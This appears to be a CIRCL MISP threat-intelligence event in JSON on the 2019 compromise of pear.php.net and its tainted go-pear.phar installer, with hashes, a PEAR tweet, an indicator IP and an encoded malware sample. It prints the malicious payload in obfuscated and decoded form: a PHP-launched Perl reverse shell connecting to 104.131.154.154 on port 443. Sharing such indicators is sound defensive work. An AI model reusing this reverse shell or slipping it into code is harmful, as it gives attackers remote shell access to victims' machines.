misp-circl-feed/feeds/circl/misp/5c45721d-de08-4fff-b9b0-168a02de0b81.json

288 lines
805 KiB
JSON
Raw Normal View History

2023-04-21 13:25:09 +00:00
{
"Event": {
"analysis": "1",
"date": "2019-01-21",
"extends_uuid": "",
"info": "Incident - pear.php.net - compromised and delivering malicious package",
"publish_timestamp": "1548332640",
"published": true,
"threat_level_id": "3",
"timestamp": "1548332586",
"uuid": "5c45721d-de08-4fff-b9b0-168a02de0b81",
"Orgc": {
"name": "CIRCL",
"uuid": "55f6ea5e-2c60-40e5-964f-47a8950d210f"
},
"Tag": [
{
"colour": "#004646",
"name": "type:OSINT"
},
{
"colour": "#0071c3",
"name": "osint:lifetime=\"perpetual\""
},
{
"colour": "#0087e8",
"name": "osint:certainty=\"50\""
},
{
"colour": "#ffffff",
"name": "tlp:white"
},
{
"colour": "#203f00",
"name": "circl:incident-classification=\"system-compromise\""
},
{
"colour": "#00aeae",
"name": "ecsirt:intrusions=\"compromised\""
},
{
"colour": "#0013bb",
"name": "europol-incident:information-security=\"unauthorized-access\""
},
{
"colour": "#0014c5",
"name": "europol-incident:information-security=\"unauthorized-modification\""
},
{
"colour": "#004e5f",
"name": "veris:security_incident=\"Confirmed\""
}
],
"Attribute": [
{
"category": "Artifacts dropped",
"comment": "md5sum of the infected file",
"deleted": false,
"disable_correlation": false,
"timestamp": "1548055336",
"to_ids": false,
"type": "md5",
"uuid": "5c457328-f3c8-47bd-bfbc-201802de0b81",
"value": "1e26d9dd3110af79a9595f1a77a82de7"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1548332216",
"to_ids": false,
"type": "text",
"uuid": "5c49acb8-6624-4506-ba63-4b46950d210f",
"value": "${\"\\x47\\x4cO\\x42\\x41\\x4cS\"}[\"ki\\x72\\x69\\x68\\x71\\x68\"]=\"st\\x72\";${${\"GLOBA\\x4c\\x53\"}[\"k\\x69ri\\x68\\x71\\x68\"]}=\"\\x75\\x73\\x65\\x20\\x53\\x6f\\x63\\x6b\\x65\\x74\\x3b\\x0a\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x73\\x74\\x61\\x72\\x74\\x65\\x64\\x22\\x3b\\x0a\\x24\\x68\\x6f\\x73\\x74\\x20\\x3d\\x20\\x22\\x31\\x30\\x34\\x2e\\x31\\x33\\x31\\x2e\\x31\\x35\\x34\\x2e\\x31\\x35\\x34\\x22\\x3b\\x0a\\x24\\x70\\x6f\\x72\\x74\\x20\\x3d\\x20\\x34\\x34\\x33\\x3b\\x0a\\x24\\x70\\x72\\x6f\\x74\\x6f\\x20\\x3d\\x20\\x67\\x65\\x74\\x70\\x72\\x6f\\x74\\x6f\\x62\\x79\\x6e\\x61\\x6d\\x65\\x28\\x22\\x74\\x63\\x70\\x22\\x29\\x20\\x7c\\x7c\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x73\\x6f\\x63\\x6b\\x65\\x74\\x28\\x53\\x45\\x52\\x56\\x45\\x52\\x2c\\x20\\x50\\x46\\x5f\\x49\\x4e\\x45\\x54\\x2c\\x20\\x53\\x4f\\x43\\x4b\\x5f\\x53\\x54\\x52\\x45\\x41\\x4d\\x2c\\x20\\x24\\x70\\x72\\x6f\\x74\\x6f\\x29\\x20\\x7c\\x7c\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x6d\\x79\\x20\\x24\\x74\\x61\\x72\\x67\\x65\\x74\\x20\\x3d\\x20\\x69\\x6e\\x65\\x74\\x5f\\x61\\x74\\x6f\\x6e\\x28\\x24\\x68\\x6f\\x73\\x74\\x29\\x3b\\x0a\\x69\\x66\\x20\\x28\\x21\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x28\\x53\\x45\\x52\\x56\\x45\\x52\\x2c\\x20\\x70\\x61\\x63\\x6b\\x20\\x22\\x53\\x6e\\x41\\x34\\x78\\x38\\x22\\x2c\\x20\\x32\\x2c\\x20\\x24\\x70\\x6f\\x72\\x74\\x2c\\x20\\x24\\x74\\x61\\x72\\x67\\x65\\x74\\x29\\x29\\x20\\x7b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x6e\\x6f\\x74\\x20\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x65\\x64\\x22\\x3b\\x0a\\x20\\x20\\x65\\x78\\x69\\x74\\x28\\x29\\x3b\\x0a\\x7d\\x0a\\x69\\x66\\x20\\x28\\x21\\x66\\x6f\\x72\\x6b\\x28\\x20\\x29\\x29\\x20\\x7b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x20\\x22\\x63\\x68\\x69\\x6c\\x64\\x22\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x49\\x4e\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x4f\\x55\\x54\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x6f\\x70\\x65\\x6e\\x28\\x53\\x54\\x44\\x45\\x52\\x52\\x2c\\x22\\x3e\\x26\\x53\\x45\\x52\\x56\\x45\\x52\\x22\\x29\\x3b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x28\\x22\\x65\\x78\\x65\\x63\\x22\\x29\\x3b\\x0a\\x20\\x20\\x65\\x78\\x65\\x63\\x20\\x7b\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x22\\x7d\\x20\\x22\\x2d\\x62\\x61\\x73\\x68\\x22\\x20\\x2e\\x20\\x22\\\\0\\x22\\x20\\x78\\x20\\x34\\x3b\\x0a\\x20\\x20\\x70\\x72\\x69\\x6e\\x74\\x28\\x22\\x65\\x78\\x69\\x74\\x22\\x29\\x3b\\x0a\\x20\\x20\\x65\\x78\\x69\\x74\\x28\\x30\\x29\\x3b\\x0a\\x7d\";@exec(\"p\\x65\\x72\\x6c -e \\x27$str\\x27 \\x3e /dev/n\\x75ll\\x202\\x3e/de\\x76/\\x6e\\x75\\x6c\\x6c\");"
},
{
"category": "Network activity",
"comment": "",
"deleted": false,
"disable_correlation": false,
"timestamp": "1548332586",
"to_ids": true,
"type": "ip-dst",
"uuid": "5c49ae2a-3520-4dbb-bc74-4e04950d210f",
"value": "104.131.154.154"
}
],
"Object": [
{
"comment": "",
"deleted": false,
"description": "Microblog post like a Twitter tweet or a post on a Facebook wall.",
"meta-category": "misc",
"name": "microblog",
"template_uuid": "8ec8c911-ddbe-4f5b-895b-fbff70c42a60",
"template_version": "5",
"timestamp": "1548056697",
"uuid": "5c4572e1-8278-4d63-ba24-196a02de0b81",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "post",
"timestamp": "1548055265",
"to_ids": false,
"type": "text",
"uuid": "5c4572e1-5ae8-49cf-b341-196a02de0b81",
"value": "A security breach has been found on the http://pear.php.net webserver, with a tainted go-pear.phar discovered. The PEAR website itself has been disabled until a known clean site can be rebuilt. A more detailed announcement will be on the PEAR Blog once it's back online."
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "type",
"timestamp": "1548055266",
"to_ids": false,
"type": "text",
"uuid": "5c4572e2-39b0-4a44-815e-196a02de0b81",
"value": "Twitter"
},
{
"category": "External analysis",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "link",
"timestamp": "1548056696",
"to_ids": false,
"type": "link",
"uuid": "5c4572e2-6650-4473-bb22-196a02de0b81",
"value": "https://twitter.com/pear/status/1086634389465956352"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "username",
"timestamp": "1548055266",
"to_ids": false,
"type": "text",
"uuid": "5c4572e2-5a7c-47bd-93db-196a02de0b81",
"value": "pear"
}
]
},
{
"comment": "",
"deleted": false,
"description": "File object describing a file with meta-information",
"meta-category": "file",
"name": "file",
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
"template_version": "15",
"timestamp": "1548055396",
"uuid": "5c457364-db30-4c64-b462-299e02de0b81",
"Attribute": [
{
"category": "Payload delivery",
"comment": "",
"data": "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
"deleted": false,
"disable_correlation": false,
"object_relation": "malware-sample",
"timestamp": "1548055397",
"to_ids": true,
"type": "malware-sample",
"uuid": "5c457365-1d88-4a27-a43f-299e02de0b81",
"value": "f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8|1e26d9dd3110af79a9595f1a77a82de7"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "filename",
"timestamp": "1548055398",
"to_ids": false,
"type": "filename",
"uuid": "5c457366-e848-48cf-95e4-299e02de0b81",
"value": "f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "md5",
"timestamp": "1548055398",
"to_ids": true,
"type": "md5",
"uuid": "5c457366-e5bc-4f54-ba90-299e02de0b81",
"value": "1e26d9dd3110af79a9595f1a77a82de7"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha1",
"timestamp": "1548055399",
"to_ids": true,
"type": "sha1",
"uuid": "5c457367-38a4-4096-b771-299e02de0b81",
"value": "5b913edb2917d6b85d929659ff833e401a5cc503"
},
{
"category": "Payload delivery",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "sha256",
"timestamp": "1548055399",
"to_ids": true,
"type": "sha256",
"uuid": "5c457367-2018-4084-bb83-299e02de0b81",
"value": "f74c4406c53e5b0187b8b1cfeb5b74f88ac9294acca29bdba8bd11371b2245e8"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "size-in-bytes",
"timestamp": "1548055401",
"to_ids": false,
"type": "size-in-bytes",
"uuid": "5c457369-0ad8-4031-a193-299e02de0b81",
"value": "3604833"
}
]
},
{
"comment": "",
"deleted": false,
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
"meta-category": "misc",
"name": "script",
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
"template_version": "1",
"timestamp": "1548332550",
"uuid": "5c49ae06-c5a4-4838-a07e-4d35950d210f",
"Attribute": [
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": false,
"object_relation": "script",
"timestamp": "1548332550",
"to_ids": false,
"type": "text",
"uuid": "5c49ae06-6d90-4cbc-b5aa-4c31950d210f",
"value": "${\"GLOBALS\"}[\"kirihqh\"]=\"str\";${${\"GLOBALS\"}[\"kirihqh\"]}=\"use Socket;\r\nprint \"started\";\r\n$host = \"104.131.154.154\";\r\n$port = 443;\r\n$proto = getprotobyname(\"tcp\") || \r\nsocket(SERVER, PF_INET, SOCK_STREAM, $proto) || \r\nmy $target = inet_aton($host);\r\nif (!connect(SERVER, pack \"SnA4x8\", 2, $port, $target)) {\r\n print \"not connected\";\r\n \r\n}\r\nif (!fork( )) {\r\n print \"child\";\r\n open(STDIN,\">&SERVER\");\r\n open(STDOUT,\">&SERVER\");\r\n open(STDERR,\">&SERVER\");\r\n print(\"exec\");\r\n exec {\"/bin/sh\"} \"-bash\\\\0\" x 4;\r\n print(\"exit\");\r\n \r\n}\";@exec(\"perl -e '$str' > /dev/null 2>/dev/null\");"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "language",
"timestamp": "1548332552",
"to_ids": false,
"type": "text",
"uuid": "5c49ae08-5f08-4757-99c8-4776950d210f",
"value": "PHP"
},
{
"category": "Other",
"comment": "",
"deleted": false,
"disable_correlation": true,
"object_relation": "state",
"timestamp": "1548332552",
"to_ids": false,
"type": "text",
"uuid": "5c49ae08-4520-4f38-aeb9-452e950d210f",
"value": "Malicious"
}
]
}
]
}
}